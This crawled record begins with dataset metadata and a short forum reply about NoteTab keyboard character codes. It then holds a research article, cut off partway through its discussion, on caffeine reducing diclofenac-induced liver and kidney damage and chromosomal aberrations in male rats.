1845,
2026,
2027,
2037,
2038,
2219,
2220,
2282,
2283,
2555,
2556,
2576,
2577,
2661,
2718,
2995,
3197
],
"line_end_idx": [
34,
88,
89,
116,
117,
211,
212,
218,
219,
347,
348,
660,
661,
677,
678,
818,
819,
854,
855,
969,
970,
1126,
1127,
1301,
1302,
1586,
1587,
1602,
1603,
1830,
1831,
1844,
1845,
2026,
2027,
2037,
2038,
2219,
2220,
2282,
2283,
2555,
2556,
2576,
2577,
2661,
2718,
2995,
3197,
3202
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 3202,
"ccnet_original_nlines": 49,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.37080538272857666,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.006711409892886877,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.14932885766029358,
"rps_doc_frac_unique_words": 0.5,
"rps_doc_mean_word_length": 5.049019813537598,
"rps_doc_num_sentences": 35,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.049248695373535,
"rps_doc_word_count": 510,
"rps_doc_frac_chars_dupe_10grams": 0.11495146155357361,
"rps_doc_frac_chars_dupe_5grams": 0.11495146155357361,
"rps_doc_frac_chars_dupe_6grams": 0.11495146155357361,
"rps_doc_frac_chars_dupe_7grams": 0.11495146155357361,
"rps_doc_frac_chars_dupe_8grams": 0.11495146155357361,
"rps_doc_frac_chars_dupe_9grams": 0.11495146155357361,
"rps_doc_frac_chars_top_2gram": 0.021747570484876633,
"rps_doc_frac_chars_top_3gram": 0.013980579562485218,
"rps_doc_frac_chars_top_4gram": 0.017087379470467567,
"rps_doc_books_importance": -284.9542541503906,
"rps_doc_books_importance_length_correction": -284.9542541503906,
"rps_doc_openwebtext_importance": -162.21275329589844,
"rps_doc_openwebtext_importance_length_correction": -162.21275329589844,
"rps_doc_wikipedia_importance": -119.26893615722656,
"rps_doc_wikipedia_importance_length_correction": -119.26893615722656
},
"fasttext": {
"dclm": 0.20876145362854004,
"english": 0.9309744238853455,
"fineweb_edu_approx": 2.985508441925049,
"eai_general_math": 0.23520183563232422,
"eai_open_web_math": 0.25401806831359863,
"eai_web_code": 0.006988349836319685
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "616.2",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Pathology and Diseases"
}
},
"secondary": {
"code": "664.2",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Chemistry, Technical and Chemical engineering",
"level_3": "Food"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "9",
"label": "FAQ"
},
"secondary": {
"code": "21",
"label": "Customer Support"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-461,371,130,439,212,000
|
Loading ...
Sorry, an error occurred while loading the content.
21508Re: [Clip] RegEx issue with \w and +
Expand Messages
• Eb
Feb 1, 2011
You're right about it being a OS (I/O) function, but you're wrong about that having nothing to do with NoteTab.
--- In [email protected], Axel Berger <Axel-Berger@...> wrote:
>
> And I thought I had already given the answer. The different treatment of
> <Alt><0nnn> and <Alt><nnn> is an OS function working independent of the
> current character set in any editor. It has nothing to do with NoteTab.
Just to prove to yourself that your wrong, open a new document in NoteTab, and in MS Notpad, and press the following keystroke sequences:
ALT+0228 (SPACE) ALT+132
By your reasoning, these should produce the same results in both editors.
However, it's the application (NoteTab), that decides what a keystroke means. The OS merely assures, that the app knows which key has been pressed.
• Show all 21 messages in this topic
|
{
"url": "https://groups.yahoo.com/neo/groups/ntb-clips/conversations/messages/21508",
"source_domain": "groups.yahoo.com",
"snapshot_id": "crawl=CC-MAIN-2017-30",
"warc_metadata": {
"Content-Length": "63430",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:6WZYQMT6LMOQKLUC7WT3PSALXIDKKM6Y",
"WARC-Concurrent-To": "<urn:uuid:ed6dd62a-8fdc-409b-bdf2-a578960ba26c>",
"WARC-Date": "2017-07-23T20:55:10Z",
"WARC-IP-Address": "69.147.82.60",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:AEMDRKM6TNNIQPVHXVGQYNMPPEUI77EX",
"WARC-Record-ID": "<urn:uuid:662bb53c-854b-4e4c-82f1-065b64bad463>",
"WARC-Target-URI": "https://groups.yahoo.com/neo/groups/ntb-clips/conversations/messages/21508",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:e82618f1-afe9-4e26-99ce-06ff1ab1ec6b>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-166-47-167.ec2.internal\r\nsoftware: Nutch 1.6 (CC)\r\nisPartOf: CC-MAIN-2017-30\r\noperator: Common Crawl Admin\r\ndescription: Wide crawl of the web for July 2017\r\npublisher: Common Crawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
12,
64,
65,
107,
108,
124,
131,
147,
265,
266,
267,
268,
345,
353,
434,
514,
594,
595,
596,
597,
741,
742,
773,
774,
854,
855,
1009
],
"line_end_idx": [
12,
64,
65,
107,
108,
124,
131,
147,
265,
266,
267,
268,
345,
353,
434,
514,
594,
595,
596,
597,
741,
742,
773,
774,
854,
855,
1009,
1049
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 1049,
"ccnet_original_nlines": 27,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.34375,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.0491071417927742,
"rps_doc_frac_lines_end_with_ellipsis": 0.035714291036129,
"rps_doc_frac_no_alph_words": 0.2767857015132904,
"rps_doc_frac_unique_words": 0.6942675113677979,
"rps_doc_mean_word_length": 4.707006454467773,
"rps_doc_num_sentences": 12,
"rps_doc_symbol_to_word_ratio": 0.008928569965064526,
"rps_doc_unigram_entropy": 4.500344276428223,
"rps_doc_word_count": 157,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.05953992158174515,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.02435724064707756,
"rps_doc_frac_chars_top_3gram": 0.029769960790872574,
"rps_doc_frac_chars_top_4gram": 0.0405954010784626,
"rps_doc_books_importance": -108.40323638916016,
"rps_doc_books_importance_length_correction": -108.40323638916016,
"rps_doc_openwebtext_importance": -62.882652282714844,
"rps_doc_openwebtext_importance_length_correction": -50.205718994140625,
"rps_doc_wikipedia_importance": -39.00638961791992,
"rps_doc_wikipedia_importance_length_correction": -39.00638961791992
},
"fasttext": {
"dclm": 0.055487629026174545,
"english": 0.9094304442405701,
"fineweb_edu_approx": 1.238174319267273,
"eai_general_math": 0.31585514545440674,
"eai_open_web_math": 0.17985594272613525,
"eai_web_code": 0.013527929782867432
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.4",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "004.67",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "4",
"label": "Analyze"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "18",
"label": "Q&A Forum"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
8,613,127,098,160,793,000
|
Skip to main content
Mitigative effect of caffeine against diclofenac-induced hepato-renal damage and chromosomal aberrations in male albino rats
Abstract
Background
Among the most commonly consumed non-steroidal anti-inflammatory drugs (NSAID) is Diclofenac (Dic), especially in low-income countries due to its high efficiency and affordable price. However, the continuous administration of Diclofenac may induce toxic effects on various body organs including the liver and kidney. Caffeine (Caf) (1,3,7-trimethylxanthine) is a pharmacologically active alkaloid type with antioxidant and anti-inflammatory actions.
Aim
The current study aims to evaluate the ameliorative effect of Caffeine against Dic-induced hepato-renal toxicity and damage.
Methods
Twenty-four male albino rats type were assigned randomly into four groups (n = 6): (Group 1): Control group, (Group 2): Six male rats were exposed to Dic 10 mg/kg intraperitoneally (I.P) for 28 days, (Group 3): Six male rats were exposed to Caf (15 mg/kg orally) for 28 days; (Groups 4): Six male rats were exposed to Dic (10 mg/kg, i.p) + Caf (15 mg/kg, orally) for 28 days. Histopathological study and various biological parameters were estimated among the four groups including hemoglobin (Hb%) red blood cells (RBCs), Hematocrit (HT%), total leucocyte count (WBCs), lipid peroxidation (LPO), glutathione peroxidase (GPx), alanine aminotransferase (ALT), aspartate aminotransferase (AST), urea, creatinine, tumor necrosis factor-α (TNF-α), and nitric oxide (NO).
Results
The administration of Diclofenac resulted in significant deteriorations in the histopathological findings and estimated biological parameters. Whereas, daily Caffeine administration ameliorated Diclofenac-induced toxicity in the kidney and liver by three mechanisms including antioxidant, anti-inflammatory, and DNA damage inhibition.
Conclusion
The current study demonstrated the promising ameliorative and protective effects of Caffeine against Diclofenac-induced hepatic and renal injury.
Peer Review reports
Introduction
NSAIDs are the type of the most commonly used drug as an analgesic, anti-inflammatory, and for the treatment of rheumatoid and osteoarthritis [1]. It was previously reported that NSAIDs directly inhibit cyclooxygenase-1 (COX-1) and cyclooxygenase-2 (COX-2) enzymes activity and thereby suppress the release of thromboxane and prostaglandin [2, 3]. Prolonged and misused chronic intake of NSAIDs may lead to undesirable drawbacks including neurotoxicity, nephrotoxicity, hepatotoxicity, cardiovascular diseases, and gastrointestinal injury [4,5,6]. Diclofenac (2-[(2,6-diclorophenyl)amino]phenyl acetate) is the most abundant and widely used NSAID phenylacetic acid derivative for its wide actions including antipyretic, anti-inflammatory, and pain relief [7]. The reason why Dic administration may results in renal damage is mainly due to reduced renal blood flow resulting in ischemia and necrosis along with elevated oxidative stress and inflammatory cytokines release [8]. Meanwhile, Dic-induced liver damage may also be related to inflammation, oxidative stress, and cytochrome P450 activation [9, 10].
Both the liver and kidney play vital roles in the elimination process of wastes produced in all living organisms. Thereby, any damage in both organs results in metabolic dysfunctions and the accumulation of toxins in the body leading to systematic toxicity, and atrophy [10, 11]. In addition to filtering unnecessary products from the blood, kidneys mainly maintain electrolytes/water balance, control the secretion of erythropoietin to regulate hematopoiesis, and modulate controlled blood pressure [12, 13]. Additionally, kidneys also regulate vascular tone and sodium level, by maintaining prostaglandins secretion in order to keep a balanced renin-angiotensin system [12, 13]. By reinforcing renin secretion, prostaglandins increase potassium secretion and prevent tubular reabsorption of sodium. Since the main function of prostaglandins secretion is to maintain normal kidneys’ glomerular filtration rate (GFR), their inhibition can be a drawback of excessive daily use of diclofenac leading to abnormal renal functions and chronic kidney diseases (CKD) on the long-term [14]. Diclofenac may induce renal injury by targeting the kidney’s mitochondria leading to the reactive oxygen species (ROS) over production, apoptosis and DNA lesions [15]. Meanwhile, regarding the mechanism of diclofenac-induced chronic liver diseases (CLDs) is idiosyncratic where excessive diclofenac is metabolized by multiple cytochrome P-450 enzymes in hepatocyte resulting in glutathione (GSH) conjugation, irreversible mitochondrial dysfunction and organ severe damage [16]. Chronic kidney and liver damages can also be related to severe cellular damage induced by exaggerated release of ROS and oxidative stress including hydroxyl radicle resulting in severe activated inflammatory responses [17]. These activated inflammatory responses mediate the release of nuclear factor-kappa B (NF- B), tumor necrosis factor-alpha (TNF-α), NO, and interleukin 6 (IL-6) [18].
The absence of potential compounds that can alleviate and protect vital organs from any damage is a major problem, especially in conventional medicine. Thereby it is extremely crucial to find out natural compounds that may protect our vital organs from induced damage and cytotoxicity due to daily misused consumed drugs [19]. Caffeine is a natural methylxanthines compound commonly found in beverages and coffee. Thus, caffeine has been recently studied for its various biochemical and physiological effects, including anti-inflammatory effects and antioxidant actions [20]. It was reported previously that Caffeine administration may exert hepatoprotective and nephroprotective effects by maintaining normal AST, ALT, creatinine, and urea [21, 22]. Some studies attributed these protective effects of Caffeine due to its anti-inflammatory and antioxidant actions by scavenging reactive oxygen species (ROS) such as hydroxyl radical (OH) along with decreasing lipid peroxidation and NO [23]. Several studies have reported the protective effect of daily caffeine consumption on liver and kidney against induced oxidative stress and activated inflammatory responses [24, 25]. Ruhl and Everhart [24, 26] reported that higher caffeine consumption hinders elevated alanine aminotransferase (ALT) and aspartate aminotransferase (AST) as a marker of liver injury resulting in decreased CLDs. On the other hand, several studies have reported a renal protective effect of caffeine consumption against CKDs by increasing the GFR and maintaining the renin-angiotensin system [25, 27].
The main aim of the current study was to assess whether Dic administration as a type of analgesic OTC drug may exert severe hepato-renal toxicity represented by biological changes, and histopathological damage. The study was also designed to evaluate the protective efficiency of daily Caffeine administration on hepatic and renal tissues against the induced damage by diclofenac. Our findings reported that caffeine may be considered as a protective agent against hepatic and renal toxicity by attenuating inflammatory responses and oxidative stress.
Materials and methods
Chemicals
Diclofenac sodium (Dic) was obtained from Novartis Pharmaceutical Company, Cairo, Egypt. Meanwhile, Caffeine was purchased from sigma Aldrich company (St. Louis, MO) (CAS Number: 58-08-2). Thiobarbituric acid (TBA) was purchased from Fluka Chemical company, and trichloroacetic acid (TCA) was purchased from Merck, USA. While Dinitrophenylhydrazine (DNPH) and 5-5-dithiobis-2-nitrobenzoic acid (DTNB) were obtained from Sigma chemicals, USA.
Animals
All the conducted experimental procedures of the current study were initially approved by the Animal Research and Ethical committee of National organization of Drug Control and Research (NODCAR) approval number (NODCAR/II/53/2022) guided by the 3Rs principles (refine, reduce and replace). Twenty-four male Wistar Albino rats weighing from 200 to 250 gm (5–7 weeks old) were obtained from the animal facility house of (NODCAR, Cairo, Egypt). Rats were housed in the maintained conditions including 12 h. light/dark cycle, controlled temperature 22 ± 1℃ and with complete free access to food and water ad libitum. More importantly, the order of treatments assigned for each rat in the experimental design was equally balanced and onset period effects was considered along with rats body weight to avoid confounding effects and experimental error in the statistical study.
Study design
The twenty-four male Wistar Albino rats were assigned randomly and equally divided into four Groups (n = 6 per group). (Group 1): Ctrl group received normal saline intraperitoneally and a daily 1 mL distilled water by oral gavage to provide the same conditions as the other three groups, (Group 2) (Dic exposed group): Six male albino rats were exposed to Dic 10 mg/kg intraperitoneally (I.P) for 28 days [28] with certain modifications, (Group 3) (Caf exposed group): Six male albino rats were exposed to Caf only (15 mg/kg orally) for 28 days [29] with certain modifications; (Groups 4) (Dic + Caf exposed group): Six male albino rats were exposed to Dic (10 mg/kg, i.p) + Caf (15 mg/kg, orally) for 28 days [28, 29].
Samples handling procedures
At the end of the experimental design, rats’ body weight was first measured on day 0 and then on day 29 using automatic balance. A blood sample was taken from each rat retro-orbital vein followed by centrifugation for 5–10 min at 4℃ /3500 rpm. Serum was stored at -20℃ till being used. Subjected rats were killed by cervical dislocation followed by rapid isolation of the liver and kidney. Each isolated liver and kidney was initially weighted and then prepared for histopathology and biological studies. From each rat, part of the liver and kidney was directly fixed in formalin 10% and then being transferred to ethanol. After sectioning, the separated liver and kidney parts were stained with Hematoxylin &Eosin (H&E) for histopathology studies. While the other parts of the liver and kidney were homogenized in phosphate buffer saline (PBS) according to manufacturer instructions. Isolated supernatant of liver and kidney tissue homogenate was stored till being used. On the other hand, Femurs from each rat were aseptically Isolated and placed in DMEM (Dulbecco’s Modified Eagle Medium). Isolated cells were centrifuged and then fixed using Carnoy’s fixative (3 methanol: 1 acetic acid). Slides were prepared using flame-drying followed by being stained using buffered Giemsa (pH = 6.8). Several metaphase spreads per animal were analyzed for chromosomal aberrations [30, 31].
Assessment of serum hematology and biological parameters
The assessment of biological parameters in serum was conducted including Hemoglobin [32], Red blood cells (RBCs) [33], and Hematocrit (HCT %) [33]. Additionally, serum AST, ALT, creatinine, and urea levels were determined using available commercial kits purchased from Biodiagnostic, Cairo, Egypt.
Assessment of tissue biological parameters
Lipid peroxidation content (LPO) was measured using thiobarbituric acid procedure. The resulted chromogen was extracted by using n-butyl alcohol and detected at 532 nm. [34, 35]. Glutathione peroxidases (GPx) was estimated based on the ability of the enzyme to convert glutathione to oxidized glutathione compound. Then the remained glutathione reduces 2-nitrobenzoic acid to form a yellow colored complex measured at 412 nm. GPx activity is indirectly proportional to the degree of color intensity [36, 37]. Meanwhile, nitric Oxide (NO) was estimated using griess reaction where the colored formed product was detected at 540 nm [38], and TNF-α was detected using Elisa kit purchased from (MyBioSource, USA). All these parameters were all detected in the prepared supernatant from liver and kidney homogenate according to the mentioned references and kit instructions.
Histopathology
The isolated liver and kidney parts were mainly fixed in 10% formalin followed by being transferred to ethanol. After cryosectioning, the separated liver and kidney parts were stained with Hematoxylin and Eosin (H&E) then directly being examined under the light microscope [39].
Statistical analysis
The obtained data were expressed in the form of Mean ± SD using SPSS 18 and GraphPad Prism 5.0 software. The variance between groups was analyzed using One-Way ANOVA followed by multiple-group comparisons using the Dunnett’s test. Results were considered significant at p < 0.05. Graphs were illustrated using GraphPad Prism 5.0 software.
Results
Effects of diclofenac administration on organs and body weight
Illustrated Table 1 showed that the daily administration of Caf (group3) resulted in a non-significant difference in the measured whole body weight in addition to kidney and liver body organs weight when compared with the control group (group1) (p > 0.05). On the other hand, Table 1 revealed that the administration of Dic (group2) resulted in a significant reduction in the weight of isolated liver and kidney from each rat associated with a relevant significant increase in the whole body weight when compared with the control group (group1). The obtained data also demonstrated that the daily administration of Dic associated with the daily Caf administration for 28 days attenuated the damaging effects of Dic on organs and body weight. Whereas, an observed decrease in whole body weight in addition to significant improvement in organs weight was observed in (group4) (Dic + Caf exposed group) when compared with other subjected groups 1,2&3 as shown in Table 1 (p < 0.05).
Table 1 Mitigation effect of caffeine against diclofenac-induced damage on body and organs weight (liver & kidney)
Caffeine ameliorative effects on Diclofenac-induced hematologic disorders
It was observed that administration of Dic (group2) resulted in a significant decrease in the hematologic parameters including Hb%, RBCs, and HCT% associated with a relevant increase in WBCs count when compared with the control group (group1) (p < 0.05) as shown in Table 2. Meanwhile, the administration of Caffeine alone (group 3) resulted in no change and non-significant difference in the hematologic parameters when compared with the control group (group 1) (p > 0.05) as shown in Table 2. On the other hand, the group of rats received Dic (10 mg/kg, i.p) + Caf (15 mg/kg, orally) represented as (group 4) displayed a well-marked improvement in Hb%, RBCs, HCT%, and WBCs count when compared with other subjected groups 1, 2 & 3 as shown in Table 2 (p < 0.05).
Table 2 Mitigation effect of caffeine against diclofenac-induced hematologic disorders
Ameliorative effect of caffeine on liver and kidney functions in Diclofenac-induced liver and kidney damage
Illustrated Fig. 1a, b, c and d demonstrated that the effect of Caf sole administration (group3) for 28 days elicited no change and non-significant difference in AST, Alt, urea, and creatinine serum levels when compared with the control group (group I) (p > 0.05). Data of the current study also represented in Fig. 1a, b, c and d demonstrated that the daily administration of Dic (group2) resulted in elevated AST, Alt, urea, and creatinine serum levels when compared with the control group (group1) (p < 0.05). On the other hand, the administration of Dic (10 mg/kg, i.p) + Caf (15 mg/kg, orally) represented as (group 4) proved that caffeine administration attenuated the undue effect of Dic on liver and kidney function tests represented as AST, Alt, urea, and creatinine serum levels when compared with other subjected groups 1,2&3 as shown in Fig. 1a, b, c and d (p < 0.05).
Fig. 1
figure 1
Mitigation effect of Caffeine against Diclofenac-induced damage on liver and kidney functions. a, b Liver function tests (AST, ALT). c, d Kidney functions tests (Urea, Creatinine). Values are represented in the form of mean ± SD of (n = 6 per group) (p < 0.05). Same represented small letters indicate non-significant different (p > 0.05)
Antioxidant efficiency and Lipid peroxidation suppressed level by Caffeine administration in Diclofenac-induced liver and kidney damage
Observed results revealed that the administration of Dic (group 2) resulted in a significant increase in LPO level in addition to decreased GPx level in both liver and kidney tissue as illustrated in Fig. 2a, b, c and d when compared with the control group (group1) (p < 0.05). Whereas, a major significant decrease in LPO level associated with increased GPx liver and kidney tissue level was observed following the administration of Dic (10 mg/kg, i.p) + Caf (15 mg/kg, orally) (group 4) indicating the ameliorative effect of Caf against Dic-induced liver and kidney damage when compared with other subjected groups 1, 2 & 3 as shown in Fig. 2a, b, c and d (p < 0.05). on the other hand, Fig. 2a, b, c and d also demonstrated that the administration of Caf alone represented as (group3) revealed a non-significant change in LPO and GPx liver and kidney tissue levels when compared with the control group (group1) (p > 0.05).
Fig. 2
figure 2
Mitigation effect of Caffeine against Diclofenac-induced damage on oxidative stress in rats’ liver and kidney tissues. a, b LPO and GPx levels in liver tissue. c, d LPO and GPx levels in kidney tissue. Values are represented in the form of mean ± SD of (n = 6 per group) (p < 0.05). Same represented small letters indicate non-significant different (p > 0.05)
Triggered inflammatory markers in Diclofenac-induced liver and kidney damage
As an indicator of the degree of inflammatory damage in liver and kidney tissues, TNF-α and Nitric Oxide (NO) were significantly increased in Dic (group 2) exposed group when compared with the control group (group1) (p < 0.05) as shown in Fig. 3a, b, c and d. Meanwhile, these triggered inflammatory levels (TNF-α and NO) were restored after the administration of Dic (10 mg/kg, i.p) + Caf (15 mg/kg, orally) (group 4) indicating the ameliorative effect of Caf against Dic-induced liver and kidney damage when compared with other subjected groups 1,2&3 as shown in Fig. 3a, b, c and d (p < 0.05). On the other hand, the administration of Caf alone (group3) revealed a non-significant change in TNF-α and NO liver and kidney tissue levels when compared with the control group (group 1) (p > 0.05) as shown in Fig. 3a, b, c and d.
Fig. 3
figure 3
Mitigation effect of Caffeine against Diclofenac-induced damage on inflammatory markers in liver and kidney tissues. a, b TNF-α and NO levels in Liver tissue. cTNF-α and NO levels in Kidney tissue. Values are represented in the form of mean ± SD of (n = 6 per group) (< 0.05). Same represented small letters indicate non-significant different (p > 0.05)
Caffeine ameliorates chromosomal aberrations in Diclofenac-induced damage on bone marrow:
Illustrated Table 3 and Fig. 4 summarized the degree of bone marrow (BM) chromosomal aberrations following the administration of Dic and/or caffeine where results were represented as follow: chromatid deletions (D), dicentric (D.C), fragment (F), centric separation (CS), ring (R) and polyploidy. These mentioned structural and illustrated types of changes were indicated and identified according to the control Group1. An observed relevant decrease in the degree of chromosomal aberrations was observed following the administration of Dic (10 mg/kg, i.p) + Caf (15 mg/kg, orally) (group 4) when compared with other subjected groups 1, 2 & 3 as illustrated in Table 3 and Fig. 4 (p < 0.05). Meanwhile, the degree of total chromosomal aberrations was significantly increased following the administration of Diclofenac (group 2) indicating the degree of bone marrow damage following the daily exposure to Diclofenac (p < 0.05). Meanwhile, the sole caffeine administration (group 3) revealed normal chromosomal aberrations level when compared with the control group1 (p > 0.05) as illustrated in Table 3 and Fig. 4.
Fig. 4
figure 4
Mitigation effect of Caffeine against Diclofenac-induced damage on bone marrow chromosomal aberrations. a, b, c, d Represent the degree of bone marrow chromosomal aberrations in groups (1, 2, 3, 4) respectively. Colored arrows represent chromosomal aberrations structures: (black arrow) dicenteric, (orange arrow) deletion, (red arrow) acenteric fragment, and (blue arrow) translocation in Dic exposed group (group 2)
Table 3 Mitigation effect of caffeine against diclofenac-induced bone marrow chromosomal aberrations in male albino rats
Histopathological liver and kidney tissue examination
No histopathological alterations with intact characterized normal liver and kidney structures were detected in the control (group 1) as shown in Fig. 5a and e respectively. Meanwhile, severe atrophy, degeneration, inflamed liver and kidney tissues were observed in Dic exposed group (group2) as shown in Fig. 5b and f respectively. Whereas, normal and intact histopathological liver and kidney findings were detected in Caf exposed group (group 3) as shown in Fig. 5c and g respectively. On the other hand, very mild atrophy was detected in liver and kidney tissues following the administration of Dic (10 mg/kg, i.p) + Caf (15 mg/kg, orally) (group 4) as shown in Fig. 5d and h.
Fig. 5
figure 5
Histopathological illustrations of liver and kidney sections stained in Hematoxylin &Eosin (100x). ae Photomicrograph of the control group (group1) intact liver and kidney structures respectively. b, Photomicrograph of Dic exposed liver and kidney damages respectively (group2) indicating constricted portal area with proliferated bile duct (arrow), periportal inflammation (IF) and proliferated van Kupfer cells along with showing glomerular tuft (GT) with dilated congested blood capillaries, and dilated bowman’s space (Arrow). cg Photomicrograph of Caf exposed liver and kidney tissues respectively (group3) showing normal intact liver and kidney structure when compared with the control group (group1). d, h photomicrograph of Dic (10 mg/kg, i.p) + Caf (15 mg/kg, orally) exposed liver and kidney sections respectively (group4) showing constricted portal area (arrow) with very mild vacuolated hepatocytes (head of arrow) and slight aggregation of inflammatory cells in lobulated glomerular tuft (GT) and convoluted tubules in addition to slight cytoplasmic atrophy (Arrow)
Discussion
The overdose administration of Diclofenac can be considered toxic to all subjects including humans or animals. In the current study, the exposure to daily Dic administration for 28 days resulted in increased body weight, exaggerated inflammatory responses, altered normal hematological parameters, abnormal liver and kidney functions, triggered oxidative stress release, and suppressed antioxidant levels [8, 40, 41]. These observed toxicities can be related to the accumulation of reactive metabolites known as 4’ and 5’-hydroxydiclofenac associated with the very highly reactive benzoquinone imines compound [8, 42]. The accumulation of these compounds mainly results in increased inflammatory and oxidative stress responses in addition to decrease glutathione peroxidase capacity level. Thereby, these altered body mechanism results in suppressed body defense actions and abnormal body functions [8, 19, 42,43,44].
In agreement with our results, Diclofenac daily administration has been observed to cause a direct liver and kidney injuries in subjected rats [45]. Since AST, ALT, urea, and creatinine contents are considered the main serum biological parameters indicators of hepatic and renal damages; therefore any observed raise in the level of these parameters can be implied as hepatic and renal impairments [45]. The current study demonstrated that the daily exposure to Diclofenac resulted in elevated serum levels of AST, ALT, urea, and creatinine associated with increased LPO, NO, and TNF-α levels of both liver and kidney tissues. All these alterations are associated with modified normal hematological and suppressed antioxidants level. Whereas, these findings are in accordance with [8, 40, 41, 46, 47] who reported the severity of hepatic damages and renal toxicity as a drawback of Diclofenac misuse. Meanwhile, the increased creatinine and urea levels were found to be mainly controlled by the GFR (glomerular filtration rate). Thereby, any detected alteration in GFR can be directly correlated with elevated creatinine and urea serum levels accompanied with water retention symptoms [46, 48]. Additionally, these detected alterations are considered major signs of kidney atrophy and necrosis in addition to being considered predisposing factors for renal failure especially in the long term. On the other hand, it is suggested that elevated AST and ALT serum levels may indicate hepatotoxic tissue membrane damage due to the leakage of these enzymes to the systemic circulation [41]. Meanwhile, the increased LPO, and NO liver-kidney tissue levels can be related to decreased antioxidant capacity and free radical scavenging activity [49]. These elevated oxidative stress factors are suggested to activate various transcription factors leading to triggered inflammatory cytokines release such as TNF-α. The elevated TNF-α level in hepatic and renal tissues is suggested to be the main cascading factor for the observed hepatic and renal tissue atrophy in the histopathological studies. Additionally, chromosomal aberrations cytogenetic marker which is the most validated indicator for detecting the degree of DNA damage was significantly induced following Dic administration. These altered chromosomal aberrations may be due to damaged DNA, DNA synthesis inhibition, and topoisomerase II suppression [49].
Caffeine is a compound rich in photochemical derivatives including triterpenes, trigonelline, melanoidins, and flavonoids [50]. The antioxidant and anti-inflammatory capacity can be related to Caffeine related compounds [51], thus the administration of Caffeine significantly reduced the elevated hepatic and renal parameters in Dic exposed rats. Interestingly, the detected ameliorative and protective effect following the administration of Caffeine in Dic exposed group (group4) and in the sole Caffeine exposed rats (group3) on the liver and kidney tissues indicate that Caf has the ability to eliminate ROS and scavenger free radicals due to its efficient antioxidant and anti-inflammatory actions [52, 53]. In accordance with our results, [54] reported that Caffeine consumption activate antioxidant response elements (AREs) which induce the cellular antioxidant system expression [54, 55]. ARE proteins are vital part of the antioxidant-anti-inflammatory system that are responsible for protecting the body by neutralizing the release of free radicals and oxidizing dexterous agents. Whereas, these elevated AREs are suggested to be responsible for regulating chromosomal aberration and DNA damage [54, 55]. Thereby, Caffeine consumption decrease chromosome aberrations following the administration of Diclofenac in rats. Additionally, the anti-inflammatory 